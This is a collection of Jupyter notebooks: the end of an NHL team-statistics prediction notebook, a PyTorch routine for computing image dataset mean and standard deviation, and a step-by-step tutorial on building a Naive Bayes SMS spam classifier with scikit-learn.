# the Stanley Cup game based on their playoff averages!
predict(3.2, 32.4, 26.8, 16.3, 3.6, 52.1, 8.2, 5.3, 3, 'away')
# + id="OcgGz3RWj0a5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 797} outputId="2b3baddf-82de-40c5-b323-17cac8d7f5b8"
#pass in conditionals
condition = ((df['game_type'] == 3) & (df['season'] == 2010) & (df['head_coach'] == '<NAME>'))
df_stanley_cup_og = df[condition]
#sort by game id to ensure order is correct
df_stanley_cup_og = df_stanley_cup_og.sort_values('game_id')
#drop same columns to get matching data frame
df_stanley_cup_og = df_stanley_cup_og.drop(columns=['won', 'team_id', 'game_id', 'powerPlayGoals', 'game_number', 'settled_in', 'head_coach', 'season'])
df_stanley_cup_og
# + [markdown] id="HTJ99Fpr9w90" colab_type="text"
# # Boston Bruins Live!
# + id="zOLeJjb19wbw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 887} outputId="eb167266-3f76-4e61-8c65-00f82f1da41a"
#get latest stats on the current season here:
#https://statsapi.web.nhl.com/api/v1/teams/6/stats
#feed into model, and enjoy!
import pandas as pd
current = {"stat" : {
"gamesPlayed" : 44,
"wins" : 25,
"losses" : 8,
"ot" : 11,
"pts" : 61,
"ptPctg" : "69.3",
"goalsPerGame" : 3.318,
"goalsAgainstPerGame" : 2.432,
"evGGARatio" : 1.3235,
"powerPlayPercentage" : "27.5",
"powerPlayGoals" : 39.0,
"powerPlayGoalsAgainst" : 20.0,
"powerPlayOpportunities" : 142.0,
"penaltyKillPercentage" : "85.0",
"shotsPerGame" : 31.1591,
"shotsAllowed" : 31.0227,
"winScoreFirst" : 0.581,
"winOppScoreFirst" : 0.538,
"winLeadFirstPer" : 0.727,
"winLeadSecondPer" : 0.75,
"winOutshootOpp" : 0.522,
"winOutshotByOpp" : 0.632,
"faceOffsTaken" : 2500.0,
"faceOffsWon" : 1270.0,
"faceOffsLost" : 1230.0,
"faceOffWinPercentage" : "50.8",
"shootingPctg" : 10.6,
"savePctg" : 0.922
}}
current = pd.DataFrame.from_dict(current)
current
|
NHL_Data_Project_Team_Stats.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19"
from torchvision.datasets import ImageFolder
from torch.utils.data import TensorDataset, DataLoader
from torchvision.transforms import ToTensor
def cal_mean_std(data_loader):
    """Estimate per-channel mean and std of a dataset from a DataLoader.

    Note: this averages per-image statistics, so the returned std is the
    mean of per-image stds -- a common approximation for normalisation."""
    my_mean = 0.
    my_std = 0.
    nb_samples = 0.
    for data, _ in data_loader:
        batch_samples = data.shape[0]
        # Flatten spatial dims: (batch, channels, height*width)
        data = data.view(batch_samples, data.shape[1], -1)
        my_mean += data.mean(2).sum(0)
        my_std += data.std(2).sum(0)
        nb_samples += batch_samples
    my_mean /= nb_samples
    my_std /= nb_samples
    return my_mean, my_std
train_directory = "../input/acse-miniproject/train"
batch_size = 64
my_data = ImageFolder(train_directory, transform=ToTensor())
train_loader = DataLoader(my_data, batch_size=batch_size, shuffle=True, num_workers=0)
means, stds = cal_mean_std(train_loader)
print("Means of our training set: ", means, "\nStds of our training set: ", stds)
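# Note: `cal_mean_std` averages per-image statistics, so the std it returns is the mean of per-image stds rather than the std over all pixels. An exact two-pass version — a sketch, not part of the original notebook, assuming the same `(data, label)` DataLoader interface — would look like:

```python
import torch

def exact_mean_std(data_loader):
    """Two-pass computation: exact per-channel mean, then exact
    (population) std over all pixels in the dataset."""
    total = 0
    channel_sum = 0.
    for data, _ in data_loader:
        b = data.shape[0]
        data = data.view(b, data.shape[1], -1)
        channel_sum = channel_sum + data.sum(dim=(0, 2))
        total += b * data.shape[2]  # pixels per channel seen so far
    mean = channel_sum / total

    sq_diff = 0.
    for data, _ in data_loader:
        b = data.shape[0]
        data = data.view(b, data.shape[1], -1)
        sq_diff = sq_diff + ((data - mean.view(1, -1, 1)) ** 2).sum(dim=(0, 2))
    std = torch.sqrt(sq_diff / total)
    return mean, std
```

The difference is usually small in practice, which is why the one-pass shortcut above is common for computing normalisation constants.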
# + _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0"
|
PoissoNet/Mean and std finder.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Our Mission ##
#
# Spam detection is one of the major applications of Machine Learning in the interwebs today. Pretty much all of the major email service providers have spam detection systems built in and automatically classify such mail as 'Junk Mail'.
#
# In this mission we will be using the Naive Bayes algorithm to create a model that can classify SMS messages from this [dataset](https://archive.ics.uci.edu/ml/datasets/SMS+Spam+Collection) as spam or not spam, based on the training we give to the model. It is important to have some level of intuition as to what a spammy text message might look like. Usually they have words like 'free', 'win', 'winner', 'cash', 'prize' and the like in them as these texts are designed to catch your eye and in some sense tempt you to open them. Also, spam messages tend to have words written in all capitals and also tend to use a lot of exclamation marks. To the recipient, it is usually pretty straightforward to identify a spam text and our objective here is to train a model to do that for us!
#
# Being able to identify spam messages is a binary classification problem as messages are classified as either 'Spam' or 'Not Spam' and nothing else. Also, this is a supervised learning problem, as we will be feeding a labelled dataset into the model, that it can learn from, to make future predictions.
# ### Step 0: Introduction to the Naive Bayes Theorem ###
#
# Bayes theorem is one of the earliest probabilistic inference algorithms developed by Reverend Bayes (which he used to try and infer the existence of God no less) and still performs extremely well for certain use cases.
#
# It's best to understand this theorem using an example. Let's say you are a member of the Secret Service and you have been deployed to protect the Democratic presidential nominee during one of his/her campaign speeches. Being a public event that is open to all, your job is not easy and you have to be on the constant lookout for threats. So one place to start is to assign a certain threat factor to each person. Based on the features of an individual, like age and sex, and other smaller factors such as whether the person is carrying a bag or looks nervous, you can make a judgement call as to whether that person is a viable threat.
#
# If an individual ticks all the boxes up to a level where it crosses a threshold of doubt in your mind, you can take action and remove that person from the vicinity. The Bayes theorem works in the same way, as we are computing the probability of an event (a person being a threat) based on the probabilities of certain related events (age, sex, presence of a bag, nervousness, etc.).
#
# One thing to consider is the independence of these features amongst each other. For example, if a child looks nervous at the event, the likelihood of that person being a threat is not as high as, say, if it were a grown man who was nervous. To break this down a bit further, there are two features we are considering here: age AND nervousness. If we looked at these features individually, we could design a model that flags ALL persons that are nervous as potential threats. However, we would likely have a lot of false positives, as there is a strong chance that minors present at the event will be nervous. Hence, by considering the age of a person along with the 'nervousness' feature, we would get a more accurate result as to who is a potential threat and who isn't.
#
# This is the 'Naive' bit of the theorem: it considers each feature to be independent of the others, which may not always be the case, and that can affect the final judgement.
#
# In short, Bayes' theorem calculates the probability of a certain event happening (in our case, a message being spam) based on the joint probability distributions of certain other events (in our case, the appearance of certain words in the message). We will dive into the workings of Bayes' theorem later in the mission, but first, let us understand the data we are going to work with.
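# The judgement call in the Secret Service example can be sketched numerically with Bayes' rule; every probability below is invented purely for illustration:

```python
# Hypothetical numbers for the threat example above.
p_threat = 0.01                 # prior: probability a person is a threat
p_nervous_given_threat = 0.9    # likelihood: threats are usually nervous
p_nervous_given_safe = 0.1      # likelihood: most non-threats are calm

# Total probability of observing nervousness (law of total probability)
p_nervous = (p_nervous_given_threat * p_threat
             + p_nervous_given_safe * (1 - p_threat))

# Bayes' rule: P(threat | nervous)
posterior = p_nervous_given_threat * p_threat / p_nervous
print(round(posterior, 3))  # -> 0.083
```

# Even though threats are almost always nervous, the posterior stays low because the prior is small — exactly why combining several features (age AND nervousness) matters.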
# ### Step 1.1: Understanding our dataset ###
#
#
# We will be using a dataset originally compiled and posted on the UCI Machine Learning repository which has a very good collection of datasets for experimental research purposes. If you're interested, you can review the [abstract](https://archive.ics.uci.edu/ml/datasets/SMS+Spam+Collection) and the original [compressed data file](https://archive.ics.uci.edu/ml/machine-learning-databases/00228/) on the UCI site. For this exercise, however, we've gone ahead and downloaded the data for you.
#
# ** Here's a preview of the data: **
#
# <img src="images/dqnb.png" height="1242" width="1242">
#
# The columns in the data set are currently not named and as you can see, there are 2 columns.
#
# The first column takes two values, 'ham' which signifies that the message is not spam, and 'spam' which signifies that the message is spam.
#
# The second column is the text content of the SMS message that is being classified.
# >** Instructions: **
# * Import the dataset into a pandas dataframe using the read_table method. The file has already been downloaded, and you can access it using the filepath 'smsspamcollection/SMSSpamCollection'. Because this is a tab separated dataset we will be using '\t' as the value for the 'sep' argument which specifies this format.
# * Also, rename the column names by specifying a list ['label', 'sms_message'] to the 'names' argument of read_table().
# * Print the first five values of the dataframe with the new column names.
# +
'''
Solution
'''
import pandas as pd
# Dataset available using filepath 'smsspamcollection/SMSSpamCollection'
df = pd.read_table('smsspamcollection/SMSSpamCollection',
sep='\t',
header=None,
names=['label', 'sms_message'])
# Output printing out first 5 rows
df.head()
# -
# ### Step 1.2: Data Preprocessing ###
#
# Now that we have a basic understanding of what our dataset looks like, lets convert our labels to binary variables, 0 to represent 'ham'(i.e. not spam) and 1 to represent 'spam' for ease of computation.
#
# You might be wondering why do we need to do this step? The answer to this lies in how scikit-learn handles inputs. Scikit-learn only deals with numerical values and hence if we were to leave our label values as strings, scikit-learn would do the conversion internally (more specifically, the string labels would be cast to unknown float values).
#
# Our model would still be able to make predictions if we left our labels as strings but we could have issues later when calculating performance metrics, for example when calculating our precision and recall scores. Hence, to avoid unexpected 'gotchas' later, it is good practice to have our categorical values be fed into our model as integers.
# >**Instructions: **
# * Convert the values in the 'label' column to numerical values using the map method as follows:
# {'ham':0, 'spam':1} This maps the 'ham' value to 0 and the 'spam' value to 1.
# * Also, to get an idea of the size of the dataset we are dealing with, print out number of rows and columns using
# 'shape'.
'''
Solution
'''
df['label'] = df.label.map({'ham':0, 'spam':1})
print(df.shape) # returns (rows, columns)
df.head()
# ### Step 2.1: Bag of words ###
#
# What we have here in our data set is a large collection of text data (5,572 rows of data). Most ML algorithms rely on numerical data to be fed into them as input, and email/sms messages are usually text heavy.
#
# Here we'd like to introduce the Bag of Words (BoW) concept, which is a term used to describe problems that have a 'bag of words', or a collection of text data that needs to be worked with. The basic idea of BoW is to take a piece of text and count the frequency of the words in that text. It is important to note that the BoW concept treats each word individually and the order in which the words occur does not matter.
#
# Using a process which we will go through now, we can convert a collection of documents to a matrix, with each document being a row and each word (token) being a column, and the corresponding (row, column) values being the frequency of occurrence of each word or token in that document.
#
# For example:
#
# Let's say we have 4 documents as follows:
#
# `['Hello, how are you!',
# 'Win money, win from home.',
# 'Call me now',
# 'Hello, Call you tomorrow?']`
#
# Our objective here is to convert this set of text to a frequency distribution matrix, as follows:
#
# <img src="images/countvectorizer.png" height="542" width="542">
#
# Here as we can see, the documents are numbered in the rows, and each word is a column name, with the corresponding value being the frequency of that word in the document.
#
# Let's break this down and see how we can do this conversion using a small set of documents.
#
# To handle this, we will be using scikit-learn's
# [CountVectorizer](http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.CountVectorizer.html#sklearn.feature_extraction.text.CountVectorizer) method, which does the following:
#
# * It tokenizes the string (separates the string into individual words) and gives an integer ID to each token.
# * It counts the occurrence of each of those tokens.
#
# ** Please Note: **
#
# * The CountVectorizer method automatically converts all tokenized words to their lower case form so that it does not treat words like 'He' and 'he' differently. It does this using the `lowercase` parameter which is by default set to `True`.
#
# * It also ignores all punctuation so that words followed by a punctuation mark (for example: 'hello!') are not treated differently than the same words not prefixed or suffixed by a punctuation mark (for example: 'hello'). It does this using the `token_pattern` parameter which has a default regular expression which selects tokens of 2 or more alphanumeric characters.
#
# * The third parameter to take note of is the `stop_words` parameter. Stop words refer to the most commonly used words in a language. They include words like 'am', 'an', 'and', 'the' etc. By setting this parameter value to `english`, CountVectorizer will automatically ignore all words (from our input text) that are found in the built-in list of English stop words in scikit-learn. This is extremely helpful as stop words can skew our calculations when we are trying to find certain key words that are indicative of spam.
#
# We will dive into the application of each of these into our model in a later step, but for now it is important to be aware of such preprocessing techniques available to us when dealing with textual data.
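# As a quick illustrative sketch of two of these parameters in action (the two documents below are made up for this demo; we apply `stop_words` properly in a later step):

```python
from sklearn.feature_extraction.text import CountVectorizer

docs = ['Hello, how are you!', 'Win money, win from home.']

# Default settings: text is lowercased and punctuation is stripped
default_vec = CountVectorizer()
default_vec.fit(docs)
print(sorted(default_vec.vocabulary_))

# stop_words='english' drops common words like 'how', 'are', 'you'
filtered_vec = CountVectorizer(stop_words='english')
filtered_vec.fit(docs)
print(sorted(filtered_vec.vocabulary_))
```

# Comparing the two vocabularies shows the stop words disappearing while content words like 'win' and 'money' survive.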
# ### Step 2.2: Implementing Bag of Words from scratch ###
#
# Before we dive into scikit-learn's Bag of Words(BoW) library to do the dirty work for us, let's implement it ourselves first so that we can understand what's happening behind the scenes.
#
# ** Step 1: Convert all strings to their lower case form. **
#
# Let's say we have a document set:
#
# ```
# documents = ['Hello, how are you!',
# 'Win money, win from home.',
# 'Call me now.',
# 'Hello, Call hello you tomorrow?']
# ```
# >>** Instructions: **
# * Convert all the strings in the documents set to their lower case. Save them into a list called 'lower_case_documents'. You can convert strings to their lower case in python by using the lower() method.
#
# +
'''
Solution:
'''
documents = ['Hello, how are you!',
'Win money, win from home.',
'Call me now.',
'Hello, Call hello you tomorrow?']
lower_case_documents = []
for i in documents:
lower_case_documents.append(i.lower())
print(lower_case_documents)
# -
# ** Step 2: Removing all punctuations **
#
# >>**Instructions: **
# Remove all punctuation from the strings in the document set. Save them into a list called
# 'sans_punctuation_documents'.
# +
'''
Solution:
'''
sans_punctuation_documents = []
import string
for i in lower_case_documents:
sans_punctuation_documents.append(i.translate(str.maketrans('', '', string.punctuation)))
print(sans_punctuation_documents)
# -
# ** Step 3: Tokenization **
#
# Tokenizing a sentence in a document set means splitting up a sentence into individual words using a delimiter. The delimiter specifies what character we will use to identify the beginning and end of a word (for example, we could use a single space as the delimiter for identifying words in our document set).
# >>**Instructions:**
# Tokenize the strings stored in 'sans_punctuation_documents' using the split() method, and store the final document set
# in a list called 'preprocessed_documents'.
#
'''
Solution:
'''
preprocessed_documents = []
for i in sans_punctuation_documents:
preprocessed_documents.append(i.split(' '))
print(preprocessed_documents)
# ** Step 4: Count frequencies **
#
# Now that we have our document set in the required format, we can proceed to counting the occurrence of each word in each document of the document set. We will use the `Counter` method from the Python `collections` library for this purpose.
#
# `Counter` counts the occurrence of each item in the list and returns a dictionary with the key as the item being counted and the corresponding value being the count of that item in the list.
# >>**Instructions:**
# Using the Counter() method and preprocessed_documents as the input, create a dictionary with the keys being each word in each document and the corresponding values being the frequency of occurrence of that word. Save each Counter dictionary as an item in a list called 'frequency_list'.
#
# +
'''
Solution
'''
frequency_list = []
import pprint
from collections import Counter
for i in preprocessed_documents:
frequency_counts = Counter(i)
frequency_list.append(frequency_counts)
pprint.pprint(frequency_list)
# -
# Congratulations! You have implemented the Bag of Words process from scratch! As we can see in our previous output, we have a frequency distribution dictionary which gives a clear view of the text that we are dealing with.
#
# We should now have a solid understanding of what is happening behind the scenes in the `sklearn.feature_extraction.text.CountVectorizer` method of scikit-learn.
#
# We will now implement `sklearn.feature_extraction.text.CountVectorizer` method in the next step.
# ### Step 2.3: Implementing Bag of Words in scikit-learn ###
#
# Now that we have implemented the BoW concept from scratch, let's go ahead and use scikit-learn to do this process in a clean and succinct way. We will use the same document set as we used in the previous step.
'''
Here we will look to create a frequency matrix on a smaller document set to make sure we understand how the
document-term matrix generation happens. We have created a sample document set 'documents'.
'''
documents = ['Hello, how are you!',
'Win money, win from home.',
'Call me now.',
'Hello, Call hello you tomorrow?']
# >>**Instructions:**
# Import the sklearn.feature_extraction.text.CountVectorizer method and create an instance of it called 'count_vector'.
'''
Solution
'''
from sklearn.feature_extraction.text import CountVectorizer
count_vector = CountVectorizer()
# ** Data preprocessing with CountVectorizer() **
#
# In Step 2.2, we implemented a version of the CountVectorizer() method from scratch that entailed cleaning our data first. This cleaning involved converting all of our data to lower case and removing all punctuation marks. CountVectorizer() has certain parameters which take care of these steps for us. They are:
#
# * `lowercase = True`
#
# The `lowercase` parameter has a default value of `True` which converts all of our text to its lower case form.
#
#
# * `token_pattern = (?u)\\b\\w\\w+\\b`
#
# The `token_pattern` parameter has a default regular expression value of `(?u)\\b\\w\\w+\\b` which ignores all punctuation marks and treats them as delimiters, while accepting alphanumeric strings of length greater than or equal to 2, as individual tokens or words.
#
#
# * `stop_words`
#
# The `stop_words` parameter, if set to `english` will remove all words from our document set that match a list of English stop words which is defined in scikit-learn. Considering the size of our dataset and the fact that we are dealing with SMS messages and not larger text sources like e-mail, we will not be setting this parameter value.
#
# You can take a look at all the parameter values of your `count_vector` object by simply printing out the object as follows:
'''
Practice note:
Print the 'count_vector' object which is an instance of 'CountVectorizer()'
'''
print(count_vector)
# >>**Instructions:**
# Fit your document dataset to the CountVectorizer object you have created using fit(), and get the list of words
# which have been categorized as features using the get_feature_names() method.
'''
Solution:
'''
count_vector.fit(documents)
count_vector.get_feature_names()
# The `get_feature_names()` method returns our feature names for this dataset, which is the set of words that make up our vocabulary for 'documents'.
# >>**
# Instructions:**
# Create a matrix with the rows being each of the 4 documents, and the columns being each word.
# The corresponding (row, column) value is the frequency of occurrence of that word (in the column) in a particular
# document (in the row). You can do this using the transform() method and passing in the document data set as the
# argument. The transform() method returns a matrix of numpy integers; you can convert this to an array using
# toarray(). Call the array 'doc_array'.
#
'''
Solution
'''
doc_array = count_vector.transform(documents).toarray()
doc_array
# Now we have a clean representation of the documents in terms of the frequency distribution of the words in them. To make it easier to understand our next step is to convert this array into a dataframe and name the columns appropriately.
# >>**Instructions:**
# Convert the array we obtained, loaded into 'doc_array', into a dataframe and set the column names to
# the word names (which you computed earlier using get_feature_names()). Call the dataframe 'frequency_matrix'.
#
'''
Solution
'''
frequency_matrix = pd.DataFrame(doc_array,
columns = count_vector.get_feature_names())
frequency_matrix
# Congratulations! You have successfully implemented a Bag of Words problem for a document dataset that we created.
#
# One potential issue that can arise from using this method out of the box is the fact that if our dataset of text is extremely large (say, a large collection of news articles or email data), there will be certain values that are more common than others simply due to the structure of the language itself. For example, words like 'is', 'the', 'an', pronouns, grammatical constructs, etc. could skew our matrix and affect our analysis.
#
# There are a couple of ways to mitigate this. One way is to use the `stop_words` parameter and set its value to `english`. This will automatically ignore all words (from our input text) that are found in a built-in list of English stop words in scikit-learn.
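# As a quick sketch of this in action (the two messages below are made up purely for illustration), setting `stop_words='english'` filters the common words out before the vocabulary is built:

```python
from sklearn.feature_extraction.text import CountVectorizer

# Two made-up messages; 'how', 'are', 'you' and 'from' appear on
# scikit-learn's built-in English stop word list and are dropped.
toy_docs = ['Hello, how are you!', 'Win money, win from home.']
cv = CountVectorizer(stop_words='english')
cv.fit(toy_docs)
print(sorted(cv.vocabulary_))  # ['hello', 'home', 'money', 'win']
```

# Only the content-bearing words survive into the vocabulary.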
#
# Another way of mitigating this is by using the [tfidf](http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfVectorizer.html#sklearn.feature_extraction.text.TfidfVectorizer) method. This method is out of scope for the context of this lesson.
# ### Step 3.1: Training and testing sets ###
#
# Now that we have understood how to deal with the Bag of Words problem we can get back to our dataset and proceed with our analysis. Our first step in this regard would be to split our dataset into a training and testing set so we can test our model later.
#
# >>**Instructions:**
# Split the dataset into a training and testing set by using the train_test_split method in sklearn. Split the data
# using the following variables:
# * `X_train` is our training data for the 'sms_message' column.
# * `y_train` is our training data for the 'label' column
# * `X_test` is our testing data for the 'sms_message' column.
# * `y_test` is our testing data for the 'label' column
# Print out the number of rows we have in each our training and testing data.
#
# +
'''
Solution
NOTE: sklearn.cross_validation has been removed in modern scikit-learn;
use sklearn.model_selection instead.
'''
# split into training and testing sets
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(df['sms_message'],
                                                    df['label'],
                                                    random_state=1)
print('Number of rows in the total set: {}'.format(df.shape[0]))
print('Number of rows in the training set: {}'.format(X_train.shape[0]))
print('Number of rows in the test set: {}'.format(X_test.shape[0]))
# -
# ### Step 3.2: Applying Bag of Words processing to our dataset. ###
#
# Now that we have split the data, our next objective is to follow the steps from Step 2: Bag of words and convert our data into the desired matrix format. To do this we will be using CountVectorizer() as we did before. There are two steps to consider here:
#
# * Firstly, we have to fit our training data (`X_train`) into `CountVectorizer()` and return the matrix.
# * Secondly, we have to transform our testing data (`X_test`) to return the matrix.
#
# Note that `X_train` is our training data for the 'sms_message' column in our dataset and we will be using this to train our model.
#
# `X_test` is our testing data for the 'sms_message' column and this is the data we will be using(after transformation to a matrix) to make predictions on. We will then compare those predictions with `y_test` in a later step.
#
# For now, we have provided the code that does the matrix transformations for you!
'''
[Practice Node]
The code for this segment is in 2 parts. Firstly, we are learning a vocabulary dictionary for the training data
and then transforming the data into a document-term matrix; secondly, for the testing data we are only
transforming the data into a document-term matrix.
This is similar to the process we followed in Step 2.3
We will provide the transformed data to students in the variables 'training_data' and 'testing_data'.
'''
# +
'''
Solution
'''
# Instantiate the CountVectorizer method
count_vector = CountVectorizer()
# Fit the training data and then return the matrix
training_data = count_vector.fit_transform(X_train)
# Transform testing data and return the matrix. Note we are not fitting the testing data into the CountVectorizer()
testing_data = count_vector.transform(X_test)
# -
# ### Step 4.1: Bayes Theorem implementation from scratch ###
#
# Now that we have our dataset in the format that we need, we can move on to the next portion of our mission: the algorithm we will use to make predictions and classify a message as spam or not spam. Remember that at the start of the mission we briefly discussed Bayes' theorem, but now we shall go into a little more detail. In layman's terms, Bayes' theorem calculates the probability of an event occurring based on certain other probabilities that are related to the event in question. It is composed of a prior (the probabilities that we are aware of, or that are given to us) and the posterior (the probabilities we are looking to compute using the priors).
#
# Let us implement the Bayes Theorem from scratch using a simple example. Let's say we are trying to find the odds of an individual having diabetes, given that he or she was tested for it and got a positive result.
# In the medical field, such probabilities play a very important role as they usually deal with life and death situations.
#
# We assume the following:
#
# `P(D)` is the probability of a person having Diabetes. Its value is `0.01` or, in other words, 1% of the general population has diabetes (Disclaimer: these values are assumptions and are not reflective of any medical study).
#
# `P(Pos)` is the probability of getting a positive test result.
#
# `P(Neg)` is the probability of getting a negative test result.
#
# `P(Pos|D)` is the probability of getting a positive result on a test done for detecting diabetes, given that you have diabetes. This has a value `0.9`. In other words the test is correct 90% of the time. This is also called the Sensitivity or True Positive Rate.
#
# `P(Neg|~D)` is the probability of getting a negative result on a test done for detecting diabetes, given that you do not have diabetes. This also has a value of `0.9` and is therefore correct, 90% of the time. This is also called the Specificity or True Negative Rate.
#
# The Bayes formula is as follows:
#
# <img src="images/bayes_formula.png" height="242" width="242">
#
# * `P(A)` is the prior probability of A occurring independently. In our example this is `P(D)`. This value is given to us.
#
# * `P(B)` is the prior probability of B occurring independently. In our example this is `P(Pos)`.
#
# * `P(A|B)` is the posterior probability that A occurs given B. In our example this is `P(D|Pos)`. That is, **the probability of an individual having diabetes, given that that individual got a positive test result. This is the value that we are looking to calculate.**
#
# * `P(B|A)` is the likelihood probability of B occurring, given A. In our example this is `P(Pos|D)`. This value is given to us.
# Putting our values into the formula for Bayes theorem we get:
#
# `P(D|Pos) = (P(D) * P(Pos|D)) / P(Pos)`
#
# The probability of getting a positive test result `P(Pos)` can be calculated using the Sensitivity and Specificity as follows:
#
# `P(Pos) = [P(D) * Sensitivity] + [P(~D) * (1 - Specificity)]`
'''
Instructions:
Calculate probability of getting a positive test result, P(Pos)
'''
# +
'''
Solution (skeleton code will be provided)
'''
# P(D)
p_diabetes = 0.01
# P(~D)
p_no_diabetes = 0.99
# Sensitivity or P(Pos|D)
p_pos_diabetes = 0.9
# Specificity or P(Neg|~D)
p_neg_no_diabetes = 0.9
# P(Pos)
p_pos = (p_diabetes * p_pos_diabetes) + (p_no_diabetes * (1 - p_neg_no_diabetes))
print('The probability of getting a positive test result P(Pos) is: {}'.format(p_pos))
# -
# ** Using all of this information we can calculate our posteriors as follows: **
#
# The probability of an individual having diabetes, given that, that individual got a positive test result:
#
# `P(D|Pos) = (P(D) * Sensitivity) / P(Pos)`
#
# The probability of an individual not having diabetes, given that, that individual got a positive test result:
#
# `P(~D|Pos) = (P(~D) * (1 - Specificity)) / P(Pos)`
#
# The sum of our posteriors will always equal `1`.
'''
Instructions:
Compute the probability of an individual having diabetes, given that, that individual got a positive test result.
In other words, compute P(D|Pos).
The formula is: P(D|Pos) = (P(D) * P(Pos|D)) / P(Pos)
'''
'''
Solution
'''
# P(D|Pos)
p_diabetes_pos = (p_diabetes * p_pos_diabetes) / p_pos
print('Probability of an individual having diabetes, given that that individual got a positive test result is:',
      p_diabetes_pos)
'''
Instructions:
Compute the probability of an individual not having diabetes, given that, that individual got a positive test result.
In other words, compute P(~D|Pos).
The formula is: P(~D|Pos) = (P(~D) * P(Pos|~D)) / P(Pos)
Note that P(Pos|~D) can be computed as 1 - P(Neg|~D).
Therefore:
P(Pos|~D) = p_pos_no_diabetes = 1 - 0.9 = 0.1
'''
# +
'''
Solution
'''
# P(Pos|~D)
p_pos_no_diabetes = 0.1
# P(~D|Pos)
p_no_diabetes_pos = (p_no_diabetes * p_pos_no_diabetes) / p_pos
print('Probability of an individual not having diabetes, given that that individual got a positive test result is:',
      p_no_diabetes_pos)
# -
# Congratulations! You have implemented Bayes theorem from scratch. Your analysis shows that even if you get a positive test result, there is only an 8.3% chance that you actually have diabetes and a 91.7% chance that you do not. This of course assumes that only 1% of the entire population has diabetes, which is just an assumption.
# ** What does the term 'Naive' in 'Naive Bayes' mean? **
#
# The term 'Naive' in Naive Bayes comes from the fact that the algorithm considers the features that it is using to make the predictions to be independent of each other, which may not always be the case. So in our Diabetes example, we are considering only one feature, that is the test result. Say we added another feature, 'exercise'. Let's say this feature has a binary value of `0` and `1`, where the former signifies that the individual exercises less than or equal to 2 days a week and the latter signifies that the individual exercises greater than or equal to 3 days a week. If we had to use both of these features, namely the test result and the value of the 'exercise' feature, to compute our final probabilities, Bayes' theorem would fail. Naive Bayes' is an extension of Bayes' theorem that assumes that all the features are independent of each other.
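# To make the independence assumption concrete, here is a minimal sketch extending the diabetes example with the hypothetical 'exercise' feature described above. The exercise likelihoods (`p_ex_d`, `p_ex_nd`) are invented purely for illustration; under the naive assumption the per-feature likelihoods simply multiply:

```python
# Priors and test likelihoods (same values as the example above)
p_d, p_nd = 0.01, 0.99
p_pos_d, p_pos_nd = 0.9, 0.1
# Assumed likelihoods for the hypothetical 'exercise' feature
p_ex_d, p_ex_nd = 0.2, 0.5

# Naive assumption: P(Pos, Ex | D) = P(Pos | D) * P(Ex | D)
num_d = p_d * p_pos_d * p_ex_d
num_nd = p_nd * p_pos_nd * p_ex_nd
p_d_given_pos_ex = num_d / (num_d + num_nd)
print(p_d_given_pos_ex)
```

# Whether that product is a good approximation depends on how independent the features really are.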
# ### Step 4.2: Naive Bayes implementation from scratch ###
#
#
# Now that you have understood the ins and outs of Bayes Theorem, we will extend it to consider cases where we have more than one feature.
#
# Let's say that we have two political parties' candidates, 'Jill Stein' of the Green Party and 'Gary Johnson' of the Libertarian Party, and we have the probabilities of each of these candidates saying the words 'freedom', 'immigration' and 'environment' when they give a speech:
#
# * Probability that Jill Stein says 'freedom': 0.1 ---------> `P(F|J)`
# * Probability that Jill Stein says 'immigration': 0.1 -----> `P(I|J)`
# * Probability that Jill Stein says 'environment': 0.8 -----> `P(E|J)`
#
#
# * Probability that Gary Johnson says 'freedom': 0.7 -------> `P(F|G)`
# * Probability that Gary Johnson says 'immigration': 0.2 ---> `P(I|G)`
# * Probability that Gary Johnson says 'environment': 0.1 ---> `P(E|G)`
#
#
# And let us also assume that the probability of Jill Stein giving a speech, `P(J)`, is `0.5`, and the same for Gary Johnson, `P(G) = 0.5`.
#
#
# Given this, what if we had to find the probabilities of Jill Stein saying the words 'freedom' and 'immigration'? This is where the Naive Bayes' theorem comes into play, as we are considering two features, 'freedom' and 'immigration'.
#
# Now we are at a place where we can define the formula for the Naive Bayes' theorem:
#
# <img src="images/naivebayes.png" height="342" width="342">
#
# Here, `y` is the class variable or in our case the name of the candidate and `x1` through `xn` are the feature vectors or in our case the individual words. The theorem makes the assumption that each of the feature vectors or words (`xi`) are independent of each other.
# To break this down, we have to compute the following posterior probabilities:
#
# * `P(J|F,I)`: Probability of Jill Stein saying the words Freedom and Immigration.
#
# Using the formula and our knowledge of Bayes' theorem, we can compute this as follows: `P(J|F,I)` = `(P(J) * P(F|J) * P(I|J)) / P(F,I)`. Here `P(F,I)` is the probability of the words 'freedom' and 'immigration' being said in a speech.
#
#
# * `P(G|F,I)`: Probability of Gary Johnson saying the words Freedom and Immigration.
#
# Using the formula, we can compute this as follows: `P(G|F,I)` = `(P(G) * P(F|G) * P(I|G)) / P(F,I)`
'''
Instructions: Compute the probability of the words 'freedom' and 'immigration' being said in a speech, or
P(F,I).
The first step is multiplying the probability of Jill Stein giving a speech with her individual
probabilities of saying the words 'freedom' and 'immigration'. Store this in a variable called p_j_text.
The second step is multiplying the probability of Gary Johnson giving a speech with his individual
probabilities of saying the words 'freedom' and 'immigration'. Store this in a variable called p_g_text.
The third step is to add both of these probabilities and you will get P(F,I).
'''
# +
'''
Solution: Step 1
'''
# P(J)
p_j = 0.5
# P(F|J)
p_j_f = 0.1
# P(I|J)
p_j_i = 0.1
p_j_text = p_j * p_j_f * p_j_i
print(p_j_text)
# +
'''
Solution: Step 2
'''
# P(G)
p_g = 0.5
# P(F|G)
p_g_f = 0.7
# P(I|G)
p_g_i = 0.2
p_g_text = p_g * p_g_f * p_g_i
print(p_g_text)
# -
'''
